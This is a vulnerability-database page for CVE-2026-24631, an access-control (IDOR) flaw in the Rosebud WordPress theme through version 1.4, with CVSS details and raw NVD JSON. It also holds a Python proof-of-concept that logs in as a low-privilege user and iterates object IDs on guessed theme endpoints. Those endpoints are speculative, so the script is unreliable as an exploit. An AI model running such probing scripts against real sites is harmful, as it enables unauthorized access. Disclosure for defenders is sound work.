Security Vulnerability Report
中文
CVE-2026-24631 CVSS 5.4 MEDIUM

CVE-2026-24631

Published: 2026-01-23 15:16:23
Last Modified: 2026-04-28 15:16:21

Description

Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Rosebud rosebud allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rosebud: from n/a through <= 1.4.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Mikado-Themes Rosebud <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24631 PoC - Rosebud Theme IDOR Vulnerability # Target: WordPress sites using Rosebud theme <= 1.4 # Vulnerability: Insecure Direct Object Reference (IDOR) import requests import argparse from urllib.parse import urljoin def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-24631 """ # Common Rosebud theme endpoints that may be affected endpoints = [ '/wp-json/rosebud/v1/user-data/', '/wp-json/rosebud/v1/settings/', '/wp-admin/admin-ajax.php', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json', } # Authenticate with low-privilege account session = requests.Session() # Login as low-privilege user login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': 'low_priv_user', 'pwd': 'password', 'wp-submit': 'Log In' } session.post(login_url, data=login_data) print(f"[*] Testing {target_url} for CVE-2026-24631") # Try to access protected resources by manipulating object IDs for endpoint in endpoints: # Test with different object IDs to demonstrate IDOR for obj_id in range(1, 10): test_url = urljoin(target_url, f"{endpoint}{obj_id}") try: response = session.get(test_url, headers=headers, timeout=10) # Check if we can access resources without proper authorization if response.status_code == 200: if 'unauthorized' not in response.text.lower() and 'forbidden' not in response.text.lower(): print(f"[+] VULNERABLE: {test_url}") print(f"[+] Response length: {len(response.text)}") return True except Exception as e: print(f"[-] Error testing {test_url}: {e}") print(f"[*] Target may not be vulnerable or no accessible endpoints found") return False def main(): parser = argparse.ArgumentParser(description='CVE-2026-24631 PoC') parser.add_argument('-u', '--url', required=True, help='Target URL') args = parser.parse_args() check_vulnerability(args.url) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24631", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:22.530", "lastModified": "2026-04-28T15:16:21.267", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Rosebud rosebud allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rosebud: from n/a through <= 1.4."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en Mikado-Themes Rosebud rosebud permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Rosebud: desde n/a hasta &lt;= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/rosebud/vulnerability/wordpress-rosebud-theme-1-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}